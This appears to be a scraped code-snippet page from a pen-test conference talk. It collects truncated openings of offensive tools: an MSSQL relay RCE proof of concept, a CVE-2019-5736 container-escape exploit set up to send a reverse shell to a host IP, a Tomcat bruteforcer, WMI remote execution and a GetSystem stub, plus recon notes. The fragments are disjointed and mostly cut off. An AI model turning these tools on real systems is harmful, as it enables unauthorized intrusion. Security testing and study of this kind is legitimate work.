P3t3rp4rk3r

This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation

P3t3rp4rk3r

#!/usr/bin/env python

# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC

# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use

P3t3rp4rk3r

#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil 
import os
import stat

host='172.17.0.1'

P3t3rp4rk3r

<?php 
$infile = 'austria.csv';
$outfile = 'austria.ips';

$fp = fopen($outfile,'w');
$handle = fopen($infile, "r");
if ($handle)
{
    while (($line = fgets($handle)) !== false) {
        $line = trim($line);

P3t3rp4rk3r

"""
    Tomcat bruteforce
    Author: @itsecurityco
"""

import os
import sys
import getopt
import base64
import requests

P3t3rp4rk3r

#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages

P3t3rp4rk3r

CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.

P3t3rp4rk3r

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;

namespace GetSystem
{
    class Program
    {

P3t3rp4rk3r

# with user-agent
# credits @fo0_
wordgrab() {
  url=$1
  tmpfile="$(date "+%s")"
  curl -sLk -m 3 -A "Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0" https://$url | html2text | egrep -io "[0-9a-zA-Z\-]+" | tr '[:upper:]' '[:lower:]' | sed -r "s/^[^a-z]+//g" | sed -r "s/[^a-z0-9]+$//g" | sort -fu | tee -a $tmpfile | tr '-' '.'  | tee -a $tmpfile | tr "." "\n" >> $tmpfile
  cat $tmpfile | sort -fu
  rm $tmpfile
}

P3t3rp4rk3r

🧰 DEFCON29 Recon Village Resources

Talks videos 🎬 Watch here

---

Future of Asset Management - Ben Sadeghipour

Where to find Domains/subdomains:

• Acquisitions https://acquiredby.co/apple-acquisitions/